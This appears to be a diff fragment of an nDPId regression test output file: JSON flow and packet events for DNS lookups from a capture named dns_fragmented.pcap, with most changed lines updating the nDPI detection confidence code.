+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":22,"total-skipped-flows":0,"total-l4-payload-len":10514,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":11,"total-updates":0,"current-active-flows":4,"total-active-flows":11,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":76,"global_ts_msec":1560869882430} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1560869882430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":129,"pkt_l4_len":75,"thread_ts_msec":1560869882430,"pkt":"CFsOoYNeAAwpfKTLht1gDk+bAEsRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABERvnYANQBL7vOR3wEgAAEAAAAAAAEFc2lnb2sQdmVydGVpbHRlc3lzdGVtZQNuZXQAAAEAAQAAKRAAAAAAAAAMAAoACKFV23rIz7mH"} -00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1560869882447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":133,"pkt_l4_len":79,"thread_ts_msec":1560869882447,"pkt":"AAwpfKTLCFsOoYNeht1gBk3UAE8RPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADW+dgBPmiKR34GgAAEAAQAAAAEFc2lnb2sQdmVydGVpbHRlc3lzdGVtZQNuZXQAAAEAAcAMAAEAAQAAADwABIZbTosAACkFrAAAAAAAAA=="} -00833{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869882447,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"134.91.78.139"}} +00833{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869882447,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"134.91.78.139"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":200000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1560869886413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":131,"pkt_l4_len":77,"thread_ts_msec":1560869886413,"pkt":"CFsOoYNeAAwpfKTLht1gDXJYAE0RQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABERzk4ANQBN7vX6xwEgAAEAAAAAAAEHc2lnZmFpbBB2ZXJ0ZWlsdGVzeXN0ZW1lA25ldAAAAQABAAApEAAAAAAAAAwACgAIYOOBSPgiBSs="} -00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":200000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":200000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1560869886443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":108,"pkt_l4_len":54,"thread_ts_msec":1560869886443,"pkt":"AAwpfKTLCFsOoYNeht1gB6MtADYRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXOTgA2KY36x4GCAAEAAAAAAAAHc2lnZmFpbBB2ZXJ0ZWlsdGVzeXN0ZW1lA25ldAAAAQAB"} -00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869886443,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":1,"num_answers":0,"reply_code":2,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869886443,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":1,"num_answers":0,"reply_code":2,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1560869889796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"thread_ts_msec":1560869889796,"pkt":"CFsOoYNeAAwpfKTLht1gDB+KADsRQCABBHAfCxawAgwp\/\/58pMsmIAD+AAAAAAAAAAAAAAD+pWgANQA7UegG5AEgAAEAAAAAAAEHZm9ybWVsMQJkZQAAAQABAAApEAAAAAAAAAwACgAIf6ON2rCVwqA="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1560869889815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":117,"pkt_l4_len":63,"thread_ts_msec":1560869889815,"pkt":"AAwpfKTLCFsOoYNeht1gAAAAAD8ROyYgAP4AAAAAAAAAAAAAAP4gAQRwHwsWsAIMKf\/+fKTLADWlaAA\/kK8G5IGAAAEAAQAAAAEHZm9ybWVsMQJkZQAAAQABwAwAAQABAAAOEAAEVRnq\/QAAKRAAAAAAAAAA"} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"85.25.234.253"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"85.25.234.253"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 